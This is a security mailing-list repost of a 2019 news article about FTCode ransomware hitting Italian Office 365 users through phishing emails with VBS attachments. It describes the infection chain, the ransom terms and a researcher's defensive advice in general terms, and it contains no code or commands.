[BreachExchange] Italians Rocked by Ransomware

Destry Winant destry at riskbasedsecurity.com
Tue Oct 22 10:01:15 EDT 2019


https://www.infosecurity-magazine.com/news/italians-rocked-by-ransomware/

Italy is experiencing a rash of ransomware attacks that play dark
German rock music while encrypting victims' files.

The musical ransomware, called FTCode, was detected by security
analysts at AppRiver in malicious email campaigns directed at Italian
Office 365 customers.

Targeted inboxes have received emails with malicious content posing as
resumes, invoices, or documents scans. The emails include a Visual
Basic script (.vbs) file that downloads and blasts out Rammstein hits
while encrypting files on the victim's computer.

"The .vbs file initially launches PowerShell to download and play an
mp3 file from archive.org. At first glance, we suspected it was just a
renamed file extension for malware, a common practice to help evade
some network gateways. However, we were amused to find it launches a
Rammstein song mix," wrote AppRiver researchers.

As victims are treated to rousing renditions of "Du Hast" and "Engel,"
the script reaches out to a different domain to pull down a Jasper
malware loader. This .vbs file enables threat actors to load
additional malware of their choosing.

Once the files on the user's computer have been encrypted, a note is
left on the victim's desktop, directing the user to download, install,
and visit an onion site for further instructions.

In an attempt to establish trust with the user and show that
decryption is actually possible, the onion site offers the visitor a
chance to test file decryption with one file before they pay the full
ransom.

The cost of the ransom is set at $500 if paid within the first three
days, after which it rapidly increases to $25,000.

David Pickett, security analyst at AppRiver, warned users not to take
risks on links sent by strangers and to be particularly wary of any
content that asks to be enabled.

He said: "Users should be vigilant to never click on or open
unsolicited links or documents, especially with file types they aren’t
familiar with, such as script files (.vbs, .js, .ps1, .bat, etc.).

"Any Office file that, once opened, urges the user to Enable Content
or Enable Editing should be treated with the utmost caution and
verified from the sender out of band before doing so. If the file is
malicious, enabling content or editing disables Microsoft’s protected
view and can allow a malicious payload contained within to execute."


More information about the BreachExchange mailing list